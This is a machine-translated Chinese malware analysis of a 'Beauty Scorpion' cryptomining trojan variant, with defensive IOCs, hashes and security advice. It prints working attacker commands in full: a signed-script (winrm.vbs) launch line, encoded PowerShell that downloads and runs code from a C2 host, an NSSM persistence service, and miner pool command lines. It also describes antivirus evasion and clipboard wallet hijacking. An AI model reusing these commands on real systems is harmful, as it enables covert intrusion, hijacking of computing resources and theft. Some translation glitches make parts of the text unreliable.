【原创】“美女蝎子”挖矿木马再次来袭，利用Windows系统组件启动恶意脚本

0x1背景

腾讯御见威胁情报中心近日发现“美女蝎子”挖矿木马新变种，该变种9月以来感染数量呈上升趋势。 该挖矿木马延续了“美女蝎子”挖矿木马的一些特点，比如从下载的图片中获取恶意代码，通过各种矿机挖取多种数字加密货币，同时还增加了几个新的特性。

“美女蝎子”挖矿木马变种采用的新特性包括：

Bai使用winrm.vbs启动powershell脚本，或者通过NSSM将powershell脚本安装为服务，通过内存多次向系统white进程注入恶意代码，减少文件登陆数量，从而避免系统拦截安全功能或防病毒软件。

注意：winrm.vbs是一个带有Windows签名的脚本文件，位于system32目录下，是一个普通的系统文件。 NSSM是一个具有自动守护功能的服务管理工具。 使用该工具安装服务后，会使恶意代码难以检测和反复执行。

分析发现，“美女蝎子”挖矿木马变种明显惧怕杀毒软件。 当它检测到电脑有常见的杀毒软件在运行时，会选择退出并越狱。 因此，在这个新变种发布后的近两个月里，其挖矿收益微乎其微。 这也证明杀毒软件对病毒木马行业有一定的震慑作用。

“美女蝎子”挖矿木马变种的技术特征总结如下：

1、使用Winrm.vbs（带有微软数字签名的白色应用程序）加载恶意代码。 这种机制更容易欺骗系统安全功能和杀毒软件的拦截；

2、恶意代码运行前，会检查机器是否运行了普通的安全软件，如果是，则退出；

3、当检测到任务管理器进程时比特币挖矿软件电脑版下载，暂停门罗币挖矿进程，防止用户观察到系统资源占用异常；

4.监视剪贴板的内容。 如果中毒计算机进行以太坊或比特币交易，资金将被转移到病毒作者控制的钱包地址。

5、使用NSSM服务管理工具将Powershell恶意脚本安装为服务，使得恶意代码难以被检测到。 该服务会继续判断当前环境是否感染成功。 如果没有，请重新下载木马进行感染。

“美女蝎子”变种木马与上一版本的异同点：

相同点：

区别：

“美女蝎子”挖矿木马变种工作流程

0x2详细分析 0x2.1 winrm.vbs利用率

winrm.vbs（位于 system32 目录中的 Windows 签名脚本文件）可用于调用用户定义的 XSL 文件。

当给winrm.vbs提供'-format:pretty'或'-format:text'参数时，winrm.vbs会从cscript.exe所在目录读取WsmPty.xsl或Wsmtxt.xsl文件。 攻击者使用带有微软数字签名的白色应用程序加载恶意代码。 这种机制更容易欺骗系统安全功能和安全软件进行拦截。

木马利用过程如下：

1.创建文件C:\Users\Public\WsmPty.xsl；

2、将cscript.exe复制到C:\Users\Public\目录下；

3.通过以下命令行执行winrm.vbs调用WsmPty.xsl

C:\Users\Public\cscript.exe //nologo C:\Windows\System32\winrm.vbs 获取 wmicimv2/Win32_Process?Handle=4 -format:pretty

4、使用成功后执行powershell命令：

powershell.exe -nop -noni -w hidden -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAAoASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBwAHMALgBuAGEAbQBlAGEAcABwAC4AdwBlAGIAcwBpAHQAZQAnACkAKQA=

powershell命令base64解码：

开始睡眠秒数 20

IEX ((new-object net.webclient).downloadstring('http://ps.nameapp.website'))

Powershell 执行后从 hxxp://ps.nameapp.website 返回代码 web.ps1

执行 powershell 代码 hxxp://web.websitete.website/web.ps1

web.ps1检测到如下进程（判断有杀毒环境或机器被感染），退出powershell：

360托盘

360度

竹东方鱼

QQPc托盘

kxetray

臀托

命令

计算器

奥斯卡

然后下载hxxp://web.websitete.website/ppp.exe到目录C:\Users\Public\conhost.exe下启动。

0x2.2傀儡进程

conhost将从网站下载jpg文件

hxxp://shop.ybk001.com/memberpic/wabpek201895135056776189.jpg，如果文件大小小于600000，请从其他网站下载jpeg文件

hxxp://www.1990tu.com/i/20180905133747p52.jpeg.

“美女蝎子”新变种使用的图片由美女图片变为Windows 7默认桌面背景图片，但图片中PE文件的加密数据标记仍使用4字节“0x33E0F0D” "，内存大小记录在开始标志后的4个字节。

（参考：“美人蝎”矿工通过DNS隧道技术规避拦截）

下载图片

下载的文件大小减去0xBA3DC得到偏移值offset，然后将FileData+offset拷贝到新的内存中。

如果判断内存的前4个字节为0x33E0F0D，则将后4个字节乘以2作为数据的大小，然后调用zlib库的uncompress函数对数据进行解析解压，得到一个解压后得到PE文件。

然后创建puppet进程，然后用图片解密出来的数据替换进程内存。 如果创建失败，换成puppet进程，一共3个（cmd.exe、calc.exe、osk.exe）。

0x2.3 反杀毒 0x2.3.1 检测进程

当它开始运行并检测到反软件进程时，它会自行退出。

下面分析发现，病毒代码在运行过程中还利用COM接口枚举反软件进程，并强制结束反软件进程并删除文件。 病毒运行时，主要是躲避杀毒软件。 如果病毒先被感染，用户再安装杀毒软件，这种对抗就有可能成功。

同时会检查taskmgr.exe任务管理器进程是否正在运行。 如果正在运行，XMR挖矿进程会被挂起，防止用户通过taskmgr进程发现CPU异常进程。 当 taskmgr 进程关闭时，XMR 挖矿进程将恢复。

0x2.3.2 防止联网

在系统的hosts文件中覆盖一段文字，阻止杀毒软件访问网络。

将域名360.cn和360.com映射到IP 102.54.94.97

映射到 IP 38.25.63.10

这种对抗行为类似于上面的逻辑，如果安装了杀毒软件，检测到病毒就会退出。 如果病毒先运行，后安装杀毒软件，它就会与之抗争。

0x2.4 窃取钱包

通过检查剪贴板内容，拦截用户交易过程中使用的数字加密货币地址，窃取收益。

启动线程每隔1000ms递归调用自己获取剪贴板的内容。

如果匹配的内容长度符合以太坊钱包格式，则替换为0xe986654707f147f425a34a6087b5b2b18cdc408f

如果检测到的内容长度符合比特币钱包格式，则替换为

3GDusxDymPt1gRTrKK44ry7xME6KxxaMy6

0x2.5 挖矿 0x2.5.1 门罗挖矿木马主代码数据段包含门罗矿机的加密数据。 这一段数据与下载图片中包含的PE文件类似，以0x33E0F0D标记开头。

通过解密函数解密门罗币矿机PE

矿机使用开源门罗币挖矿程序XMRig 2.6.4编译（github地址：hxxps://github.com/xmrig/xmrig）

创建第二阶段puppet进程（带参数），使用解密后的Monero矿机填充内存，创建失败则替换为puppet进程，共3个（svchost.exe,cmd.exe,calc.exe ).

门罗币矿工 PE 塞入傀儡进程

挖矿命令行：

-a cryptonight -o stratum+tcp://pool.minexmr.com:80 -u 485XqEaLG9dfLbL36JrYxHXbSb2bhKE1QM9w1iEEoMLqFW4zXMzdqjx5HjwgtVBpEWA66CeFXbe1ACtbY6q16Kji4PmKAi5 -px

矿池：

pool.minexmr.com

钱包：

485XqEaLG9dfLbL36JrYxHXbSb2bhKE1QM9w1iEEoMLqFW4zXMzdqjx5HjwgtVBpEWA66CeFXbe1ACtbY6q16Kji4PmKAi5

收益：3.82门罗币

从钱包支付记录来看，该挖矿木马自8月1日起上线，目前已挖出3.82枚门罗币。

0x2.5.2 Bit无限挖矿

木马主体从网站下载jpeg文件

hxxp://www.1990tu.com/i/20180905132828bao.jpeg，如果文件大小小于1646406比特币挖矿软件电脑版下载，请从其他网站下载jpg文件

hxxps://s15.postimg.cc/43qcmc1d7/999.jpg。

图中包含的PE加密数据解密得到BCX(Bit Unlimited)矿机gominer，文件保存为C:\Users\***\AppData\Local\Temp\audiodg.exe，使用如下参数开始挖矿过程

audiodg.exe -url stratum+tcp://bcx.vvpool.com:5660 -user XX4tjZ4Js1fsGyWrGhXrRA2erSvjNhopHB.c -I 18

解密Gominer开源矿机

（github地址：hxxps://github.com/bitcoinx-project/gominer/tree/master/clients/stratum）

池 2：

Bcx.vvpool.com

钱包 2：

XX4tjZ4Js1fsGyWrGhXrRA2erSvjNhopHB

8月9日开始产生收益，已挖出422,863个BCX

0x2.6 持续感染

木马使用 NSSM 将 powershell 恶意脚本安装为服务。 NSSM是一个具有自动保护功能的服务管理工具。 使用此工具安装服务后，恶意代码将难以检测并反复执行。

installnssmpowershell.exe-nop-noni-whidden-encRwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAbgBzAHMAbQAgAHwAIABTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADgAMAAKAEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcABzAC4AbgBhAG0AZQBhAHAAcAAuAHcAZQBiAHMAaQB0AGUAJwApACkA

Base64解码：

获取进程名称 nssm | 停止进程

开始睡眠秒数 80

IEX ((new-object net.webclient).downloadstring('http://ps.nameapp.website'))

powershell脚本作为服务反复执行，不断判断当前环境是否被感染，否则重新下载木马进行感染。

0x3 关联分析

经分析，该样本应为此前腾讯威胁情报中心曝光的“美女蝎子”挖矿木马，相关原文链接：

之所以做出这样的判断，主要是基于该样本与“美女蝎子”木马样本在以下几个方面的相似性：

1、样本均以正常图片隐藏挖矿程序。

2、样本在调用zlib解压过程中使用的函数调用跳转代码是一致的。

3、下载图片的数据标识和结构一致。

4.样本对代码混淆使用的方法非常相似。

5、样本中使用的BCX和XMR挖矿样本是一致的。

综合以上特征，我们可以确定该样本是“美女蝎子”挖矿木马作者利用winrm.vbs漏洞利用技术发起的新一轮攻击。

两个事件中的加密数据布局

函数调用跳转代码

从笔者的收入来看，比上次有所减少。 目前只有一万多人民币，但这里有一点需要注意，就是和之前的样本一样，样本在整个感染过程中尽量避免接触国内安全。 一旦接触到软件，一旦发现用户主机的安全软件正在运行，就会直接退出。

由此可见，安全软件对病毒和木马作者具有一定的震慑能力。 当病毒和木马作者发现自己在与杀毒软件的交锋中无法取胜时，就会选择逃避。 由于杀毒软件渗透率高，病毒选择这种规避策略，导致该“美女蝎子”挖矿木马变种的挖矿收益相对较低。

木马盈利情况

安全建议

1、这种“美女蝎子”挖矿木马主要隐藏在一些盗版、破解、激活、游戏外挂等小工具软件中。 腾讯安全专家提醒用户不要使用来路不明的软件，不要随意使用破解激活工具；

2、建议个人用户使用腾讯电脑管家进行拦截。 该挖矿木马在检测到腾讯电脑管家运行时会立即跑路。

3、建议企业用户全网安装粤电终端安全管理系统。 ()

国际奥委会

C2：

ps.nameapp.website

web.websitete.website

网址

hxxp://web.websitete.website/ppp.exe

hxxp://www.1990tu.com/i/20180826221707tmk.jpeg

hxxp://shop.ybk001.com/memberpic/ndtkbt2018826223028763405.jpg

hxxp://www.1990tu.com/i/2018082621381780g.jpeg

hxxps://s15.postimg.cc/lh3rhud57/999.jpg

hxxp://shop.ybk001.com/memberpic/wabpek201895135056776189.jpg

hxxp://www.1990tu.com/i/20180905133747p52.jpeg

hxxp://www.1990tu.com/i/20180905132828bao.jpeg

hxxps://s15.postimg.cc/43qcmc1d7/999.jpg

hxxp://hao.ug118.com/ddd.jpg

hxxp://www.1990tu.com/i/20180919193857kl9.jpeg

矿池-钱包

pool.minexmr.com（门罗币）

485XqEaLG9dfLbL36JrYxHXbSb2bhKE1QM9w1iEEoMLqFW4zXMzdqjx5HjwgtVBpEWA66CeFXbe1ACtbY6q16Kji4PmKAi5

44uyyeCqheLTQpZUTK5uXWVq8iwkn5w5L2hSPuMJACj5eNAPvceRWY8dEPu5rBcBEh5EJ5Z3PajkbWKCKzixDZCm1EFkMRg

bcx.vvpool.com（比特无限）

XX4tjZ4Js1fsGyWrGhXrRA2erSvjNhopHB

MD5

7ddb1a0ed03151cd3ea76f7cb5ec28ae

4507f6f5f8dea3f651875866a5465876

f94aa36cd3086874c593298619ca8f14

7330aef076cf4498303e39031465dba5

ed3cc769e0eea63c83ac4648f0a72268

edd16109e74c0c96d006ee76c9abcbd6

47383a36d2bc68ae525dfe59d4a0f2fa

ffc962f058c5aaddc956dcf0455c04be

79f8daa3f4cd99591c9b47a0a3bfcc7a

6799501e58bd17b9db95a610d7167a07

a03aa449dbd18214eae3956ab2b2b24c

ad35b6aace32ea93691ec80c8148c82c

aa2d30992087047ef638674198209948

参考链接：

在看雪招聘平台制作简历，完成90%以上可获得500看雪币~